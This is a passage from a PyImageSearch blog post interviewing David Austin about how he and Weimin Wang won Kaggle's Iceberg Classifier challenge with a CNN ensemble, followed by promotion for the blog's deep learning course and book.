  2. And was the 7th most popular competition of all time (across all challenges types: image, text, etc.)

Soon after the competition ended, David sent me the following message:

Hi Adrian, I’m a PyImageSearch Guru’s member, consumer of all your books, will be at PyImageConf in August, and an overall appreciative student of your teaching.

Just wanted to share a success story with you, as I just finished in first out of 3,343 teams in the Statoil Iceberg Classifier Kaggle competition ($25k first place prize).

A lot of my deep learning and cv knowledge was acquired through your training and a couple of specific techniques I learned through you were used in my winning solution (thresholding and mini-Googlenet specifically). Just wanted to say thanks and to let you know you’re having a great impact.

Thanks! David

David’s personal message really meant a lot to me, and to be honest, it got me a bit emotional.

As a teacher and educator, there is no better feeling in the world than seeing readers:

  1. Get value out of what you’ve taught from your blog posts, books, and courses
  2. Use their knowledge in ways that enriches their lives and improves the lives of others

Inside today’s post I’ll be interviewing David and discussing:

  • What the iceberg image classification challenge is…and why it’s important
  • The approach, algorithms, and techniques utilized by David and Weimin in their winning submission
  • What the most difficult aspect of the challenge was (and how they overcame it)
  • His advice for anyone who wants to compete in a Kaggle competition

I am so incredibly happy for both David and Weimin — they deserve all the congrats and a huge round of applause.

Join me in this interview and discover how David and his teammate Weimin won Kaggle’s most popular image classification competition.

An interview with David Austin: 1st place and $25,000 in Kaggle’s most popular competition

Figure 1: The goal of the Kaggle Iceberg Classifier challenge is to build an image classifier that classifies input regions of a satellite image as either “iceberg” or “ship” (source).

Adrian: Hi David! Thank you for agreeing to do this interview. And congratulations on your 1st place finish in the Kaggle Iceberg Classifier Challenge, great job!

David: Thanks Adrian, it’s a pleasure to get to speak with you.


Adrian: How did you first become interested in computer vision and deep learning?

David: My interest in deep learning has been growing steadily over the past two years as I’ve seen how people have been using it to gain incredible insights from the data they work with. I have interest in both the active research as well as the practical application sides of deep learning, so I find competing in Kaggle competitions a great place to keep the skills sharp and to try out new techniques as they become available.


Adrian: What was your background in computer vision and machine learning/deep learning before you entered the competition? Did you compete in any previous Kaggle competitions?

David: My first exposure to machine learning goes back about 10 years when I first started learning about gradient boosted trees and random forests and applying them to classification type problems. Over the past couple of years I’ve started focusing more extensively on deep learning and computer vision.

I started competing in Kaggle competitions a little under a year ago in my spare time as a way to sharpen my skills, and this was my third image classification competition.


Figure 2: An example of how an iceberg looks. The goal of the Kaggle competition was to recognize such icebergs from satellite imagery (source).

Adrian: Can you tell me a bit more about the Iceberg Classifier Challenge? What motivated you to compete in it?

David: Sure, the Iceberg Classification Challenge was a binary image classification problem in which the participants were asked to classify ships vs. icebergs collected via satellite imagery. It’s especially important in the energy exploration space to be able to identify and avoid threats such as drifting icebergs.

There were a couple interesting aspects to the dataset that made this a fun challenge to work on.

First, the dataset was relatively small with only 1604 images in the training set, so the barrier to entry from a hardware perspective was pretty low, but the difficulty of working with a limited dataset was high.

Secondly, when looking at the images, to the human eye many of them look analogous to what a “snowy” TV screen looks like, just a bunch of salt and pepper noise and it was not at all visually clear which images were ships and which ones were icebergs:

Figure 3: It’s extremely difficult for the human eye to accurately determine if an input region is an “iceberg” or a “ship” (source).

So the fact that it would be particularly difficult for a human to accurately predict the classifications, I thought it would serve as a great test to see what computer vision and deep learning could do.


Figure 4: David and Weimin’s winning solution involved using an ensemble of CNN architectures.

Adrian: Let’s get a bit technical. Can you tell us a bit about the approach, algorithms, and techniques you used in your winning entry?

David: Well, the overall approach was very similar to most typical computer vision problems in that we spent quite a bit of time up front understanding the data.

One of my favorite techniques early on is to use unsupervised learning methods to identify natural patterns in the data, and use that learning to determine what deep learning approaches to take down-stream.

In this case a standard KNN algorithm was able to identify a key signal that helped define our model architecture. From there, we used a pretty extensive CNN architecture that consisted of over 100+ customized CNN’s and VGG like architectures and then combined the results from these models using both greedy blending and two-level stacking with other image features.

Now that may sound like a very complex approach, but remember that the objective function here was to minimize log loss error, and in this case we only added models in so much as they reduced log loss without overfitting, so it was another good example of the power of ensembling many weaker learners.

We ended up training many of the same CNN’s a second time but only using a subset of the data that we identified from the unsupervised learning at the beginning of the process as this also gave us an improvement in performance.


Figure 5: The most difficult aspect of the Kaggle Iceberg challenge for David and his teammate was avoiding overfitting.

Adrian: What was the most difficult aspect of the challenge for you and why?

David: The hardest part of the challenge was in validating that we weren’t overfitting.

The dataset size for an image classification problem was relatively small, so we were always worried that overfitting could be a problem. For this reason we made sure that all of our models were done using 4 fold cross validation, which adds to the computational cost, but reduces the overfitting risk. Especially when you’re dealing with an unforgiving loss function like log loss, you have to be constantly on the lookout for overfitting.


Adrian: How long did it take to train your model(s)?

David: Even with the large number of CNN’s that we chose to use, and even with using 4-fold cross validation on the entire set of models, training only took between 1-2 days. Individual models without cross validation could train in some cases on the order of minutes.


Adrian: If you had to pick the most important technique or trick you applied during the competition, what would it be?

David: Without a doubt, the most important step was the up-front exploratory analysis to give a good understanding of the dataset.

It turns out there was a very important signal in the one other feature other than the image data that helped remove a lot of noise in the data.

In my opinion one of the most overlooked steps in any CV or deep learning problem is the upfront work required to understand the data and use that knowledge to make the best design choices.

As algorithms have become more readily available and easy to import, often times there’s a rush to “throw algorithms” at a problem without really understanding if those algorithms are the right one for the job, or if there’s work that should be done before or after training to handle the data appropriately.


Figure 6: David used TensorFlow, Keras, and xgboost in the winning Kaggle submission.

Adrian: What are your tools and libraries of choice?

David: Personally I find Tensorflow and Keras to be amongst the most usable so when working on deep learning problems, I tend to stick to them.

For stacking and boosting, I use xgboost, again primarily due to familiarity and its proven results.

In this competition I used my dl4cv virtualenv (a Python virtual environment used inside Deep Learning for Computer Vision with Python) and added xgboost to it.

Adrian: What advice would you give to someone who wants to compete in their first Kaggle competition?

David: One of the great things about Kaggle competitions is the community nature of how the competitions work.

There’s a very rich discussion forum and way for participants to share their code if they choose to do so which is really invaluable when you’re trying to learn both general approaches as well as ways to apply code to a specific problem.

When I started on my first competition I spent hours reading through the forums and other high quality code and found it to be one of the best ways to learn.


Adrian: How did the PyImageSearch Gurus course and Deep Learning for Computer Vision with Python book prepare you for the Kaggle competition?

David: Very similar to competing in a Kaggle competition, PyImageSearch Gurus is a learn-by-doing formatted course.

To me there’s nothing that can prepare you for working on problems like actually working on problems and following high quality solutions and code, and one of the things I appreciate most about the PyImageSearch material is the way it walks you through practical solutions with production level code.

I also believe that one of the best ways to really learn and understand deep learning architectures is to read a paper and then go try to implement it.

This strategy is implemented in practice throughout the ImageNet Bundle book, and it’s the same strategy that can be used to modify and adapt architectures like we did in this competition.

I also learned about MiniGoogleNet from the Practitioner Bundle book which I hadn’t come across before and was a model that performed well in this competition.


Adrian: Would you recommend PyImageSearch Gurus or Deep Learning for Computer Vision with Python to other developers, researchers, and students trying to learn computer vision + deep learning?

David: Absolutely. I would recommend it to anyone who’s looking to establish a strong foundation in CV and deep learning because you’re not only going to learn the principles, but you’re going to learn how to quickly apply your learning to real-world problems using the most popular and up to date tools and SW.


Adrian: What’s next?

David: Well, I’ve got a pretty big pipeline of projects I want to work on lined up so I’m going to be busy for a while. There are a couple other Kaggle competitions that look like really fun challenges to work on so there’s a good chance I’ll jump back into those too.


Adrian: If a PyImageSearch reader wants to chat, what is the best place to connect with you?

David: The best way to reach me is my LinkedIn profile. You can connect with Weimin Wang on LinkedIn as well. I’ll also be attending PyImageConf 2018 in August if you want to chat in person.

What about you? Are you ready to follow in the footsteps of David?

Are you ready to start your journey to computer vision + deep learning mastery and follow in the footsteps of David Austin?

David is a long-time PyImageSearch reader and has worked through both:

I can’t promise you’ll win a Kaggle competition like David has, but I can guarantee that these are the two best resources available today to master computer vision and deep learning.

To quote Stephen Caldara, a Sr. Systems Engineer at Amazon Robotics:

I am very pleased with the [PyImageSearch Gurus] content you have created. I would rate it easily at a university ‘masters program’ level. And better organized.

Along with Adam Geitgey, author of the popular Machine Learning is Fun! blog series:

I highly recommend grabbing a copy of Deep Learning for Computer Vision with Python. It goes into a lot of detail and has tons of detailed examples. It’s the only book I’ve seen so far that covers both how things work and how to actually use them in the real world to solve difficult problems. Check it out!

Give the course and book a try — I’ll be there to help you every step of the way.

Summary

In today’s blog post, I interviewed David Austin, who, with his teammate, Weimin Wang, won first place (and $25,000) in Kaggle’s Iceberg Classifier Challenge.

David and Weimin’s hard work will help ensure safer, less hazardous travel through iceberg-prone waters.

I am so incredibly happy (and proud) for David and Weimin. Please join me and congratulate them in the comments section of this blog post.

The post An interview with David Austin: 1st place and $25,000 in Kaggle’s most popular image classification competition appeared first on PyImageSearch.



from PyImageSearch https://ift.tt/2G9cejF
via IFTTT